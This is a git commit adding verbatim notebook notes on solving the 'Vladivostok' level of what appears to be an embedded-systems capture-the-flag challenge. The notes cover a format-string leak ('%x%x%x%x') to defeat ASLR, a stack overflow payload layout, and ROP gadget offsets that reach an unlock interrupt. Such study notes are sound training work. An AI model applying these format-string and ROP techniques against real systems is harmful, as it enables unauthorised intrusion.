notes.md: Add book notes for Montevideo through Lagos

2025-10-29 12:29:15 +00:00 · 2023-03-15 20:13:34 -05:00
parent 5e23a963ec
commit 95e7776c8a
10 changed files with 368 additions and 0 deletions
--- a/15-Vladivostok/notes.md
+++ b/15-Vladivostok/notes.md
@@ -0,0 +1,61 @@
+`Taken verbatim from my notebook`
+# Page 1
+```
+Vladivostok     ASLR bypass?
+    username[8]: 0x242b
+    password[ ]
+    aslr_base = r11
+
+    aslr_address = normal - 0x4000 + aslr_base
+
+    Have to call 0x10 directly?
+        INT 7f:
+            Takes no arguments      (THE LESSON WAS)
+            7f passed in SR          (ROP CHAINING)
+        All calls to INT wrapped in  (+ASLR BYPASS)
+            push/pop SR?
+            Neat?
+
+    41414141[r10][r11][ret]
+    FUCKING PRINTF?
+
+    Things I have:
+        printf(username, ...)
+        buffer overflow on stack
+
+    Things I need
+        Address on stack?
+
+    Flow: 1. enter "username"
+          2. "username" printed
+                            <- Create payload
+          3. enter "password"
+          4. buffer overflow
+```
+
+# Page 2
+```
+The Hack    (Vladivostok)
+
+    Uname payload: "%x%x%x%x"
+        output %printf
+    Pword payload: "AAAA(r10)(r11)(pc)[args...]"
+
+    Useful locations:
+        +2aa:   pop sr
+        +2ac:   add 8, sp
+        +2ae:   __check_password
+
+        +56c:   mov.b @sp,   r15;
+                sxt   r15       ; pop.b r15
+                incd  sp        ;
+                ret             ;
+
+        +4f4:   swpb  r15       ;
+                mov   r15,   sr ;
+                bis   #8000, sr ; INT
+                call  0x10      ;
+                ...             ;
+                ret             ;
+
+    [popb]7f7f[INT]